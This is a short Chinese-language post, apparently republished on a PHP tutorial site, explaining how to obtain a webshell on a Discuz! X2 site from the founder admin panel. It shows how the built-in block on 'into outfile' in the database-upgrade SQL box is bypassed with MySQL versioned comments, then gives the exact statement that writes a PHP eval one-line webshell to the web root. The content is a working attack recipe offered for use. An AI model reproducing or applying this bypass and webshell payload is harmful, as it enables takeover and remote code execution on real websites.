最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell
百度无果,自己本地架设了一下
1,当mysql是root时
站长 --- 数据库 ---升级
尝试
select '1' into outfile 'E:\2.txt'
会提示
[Type] 查询语句安全威胁
[Query] select '1' into outfile 'E:\2.txt'
为什么会这样呢?
\config\config_global.php中
限制了into outfile函数
尝试绕过 HdhCmsTest2cto测试数据
/*!select*/ '1' /*!into outfile*/ 'E:\3.txt'
Discuz! 数据结构升级成功,影响的记录行数 1
如果要导出一句话,即
/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php'
注意:一句话密码不要有引号
查看更多关于Discuz X2后台getshell 鸡肋 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14502